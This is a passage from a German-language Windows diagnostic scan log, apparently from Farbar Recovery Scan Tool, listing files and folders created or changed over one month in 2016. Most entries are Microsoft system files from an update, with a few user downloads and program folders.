2016-09-27 13:02 - 2016-09-27 13:02 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\encapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00026408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerSvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiougc.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_IS2022.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanhlp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\c_GSM7.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwmp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spwmp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccessRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccessRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdxm.ocx
2016-09-27 13:02 - 2016-09-27 13:02 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxmasf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdxm.ocx
2016-09-27 13:02 - 2016-09-27 13:02 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxmasf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneutilRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneutilRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneServiceRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6r.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 17187840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 13867520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 07792640 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 06109184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 05376000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 04557824 _____ (Microsoft) C:\WINDOWS\SysWOW64\dbgeng.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 03435008 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 03116544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAJApi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02947072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02913104 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02820096 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02423296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAJApi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02289664 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02166232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02107392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 02083840 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01755136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01508864 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01029632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 01006080 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00936448 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00820736 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00806912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00773200 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00761344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00755200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00681304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00601200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2016-09-27 13:01 - 2016-09-27 13:01 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00536576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingOnlineServices.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00526848 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2016-09-27 13:01 - 2016-09-27 13:01 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00461312 _____ (Microsoft) C:\WINDOWS\SysWOW64\DbgModel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00446464 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosResource.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosResource.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00389000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtapi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00380928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\NmaDirect.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\system32\container.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00302592 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00297552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wevtapi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\container.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00225280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\C_G18030.DLL
2016-09-27 13:01 - 2016-09-27 13:01 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00178528 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00168800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00118112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\EhStorTcgDrv.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00114192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MapControls.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MapControls.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinelsa.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00079536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosHostClient.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00077312 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00073568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappprxy.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosHostClient.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapstoasttask.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys
2016-09-27 13:01 - 2016-09-27 13:01 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceassociation.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\delegatorprovider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi_passthru.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\nativemap.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\encapi.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\delegatorprovider.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi_passthru.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00020320 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvcProxy.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\C_IS2022.DLL
2016-09-27 13:01 - 2016-09-27 13:01 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\c_GSM7.DLL
2016-09-27 13:01 - 2016-09-27 13:01 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MosTrace.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosTrace.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MosHost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosHost.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6r.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlStringsRes.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2016-09-27 13:01 - 2016-09-27 13:01 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlStringsRes.dll
2016-09-27 12:57 - 2016-09-27 12:57 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files\Reference Assemblies
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files\MSBuild
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2016-09-27 12:56 - 2016-09-27 12:56 - 00000000 ____D C:\Program Files (x86)\MSBuild
2016-09-27 12:55 - 2016-09-27 12:55 - 00199008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wof.sys
2016-09-27 12:55 - 2016-05-25 15:31 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 15:31 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 15:31 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2016-09-27 12:55 - 2016-05-25 12:03 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 12:03 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2016-09-27 12:55 - 2016-05-25 12:03 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Vorlagen
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Startmenü
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Netzwerkumgebung
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Lokale Einstellungen
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Eigene Dateien
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Druckumgebung
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\AppData\Local\Verlauf
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\AppData\Local\Anwendungsdaten
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default\Anwendungsdaten
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Verlauf
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Anwendungsdaten
2016-09-27 12:24 - 2016-09-27 12:24 - 00000000 ____D C:\ProgramData\USOShared
2016-09-27 12:22 - 2016-09-27 12:23 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2016-09-27 12:22 - 2016-09-27 12:23 - 00007623 _____ C:\WINDOWS\diagerr.xml
2016-09-27 12:21 - 2016-10-19 13:10 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-09-27 12:21 - 2016-09-27 12:22 - 00002824 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task
2016-09-27 12:18 - 2016-09-27 12:18 - 00022960 _____ C:\WINDOWS\system32\emptyregdb.dat
2016-09-27 12:14 - 2016-09-27 12:14 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-09-27 12:13 - 2016-09-27 12:14 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2016-09-27 12:11 - 2016-10-17 13:13 - 00000000 ____D C:\Users\maikp
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Vorlagen
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Startmenü
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Netzwerkumgebung
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Lokale Einstellungen
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Eigene Dateien
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Druckumgebung
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\AppData\Local\Verlauf
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\AppData\Local\Anwendungsdaten
2016-09-27 12:11 - 2016-09-27 12:11 - 00000000 _SHDL C:\Users\maikp\Anwendungsdaten
2016-09-27 12:09 - 2016-09-27 12:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2016-09-27 12:09 - 2016-09-27 12:09 - 00000000 ____D C:\ProgramData\AMD
2016-09-27 12:09 - 2016-09-27 12:09 - 00000000 ____D C:\Program Files\ATI Technologies
2016-09-27 12:09 - 2016-07-16 13:41 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2016-09-27 12:08 - 2016-09-27 12:09 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 ____D C:\Program Files\AMD
2016-09-27 12:08 - 2016-09-27 12:08 - 00000000 _____ C:\WINDOWS\ativpsrm.bin
2016-09-27 12:06 - 2016-10-19 13:08 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-09-27 12:06 - 2016-09-27 12:15 - 00194296 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-09-27 12:06 - 2016-09-27 12:06 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2016-09-23 18:29 - 2016-10-14 17:56 - 00000000 ____D C:\Program Files (x86)\Funfair Machines
2016-09-23 18:28 - 2016-09-23 18:28 - 102292196 _____ () C:\Users\maikp\Downloads\Funfair-Machines-Break-Dance-No.1-V1.1-Setup.exe
2016-09-22 06:53 - 2016-09-22 06:53 - 00040555 _____ C:\Users\maikp\OneDrive\Documents\mewtwo.pdf
2016-09-21 17:50 - 2016-09-21 17:50 - 01233928 _____ (Nod ) C:\Users\maikp\Downloads\FlashPlayerPro.exe
2016-09-21 06:51 - 2016-09-27 12:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Usenet.nl
2016-09-21 06:51 - 2016-09-21 15:21 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Usenet.nl
2016-09-21 06:51 - 2016-09-21 15:19 - 00000000 ____D C:\Users\maikp\OneDrive\Documents\Usenet.nl
2016-09-21 06:51 - 2016-09-21 06:51 - 00000000 ____D C:\Program Files (x86)\Usenet.nl
2016-09-21 06:50 - 2016-09-21 06:51 - 07457256 _____ ( ) C:\Users\maikp\Downloads\UsenetNLSetup_428537f.exe
2016-09-20 17:57 - 2016-09-20 17:57 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Skype

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-10-19 13:13 - 2016-09-17 21:08 - 00000000 ___RD C:\Users\maikp\OneDrive
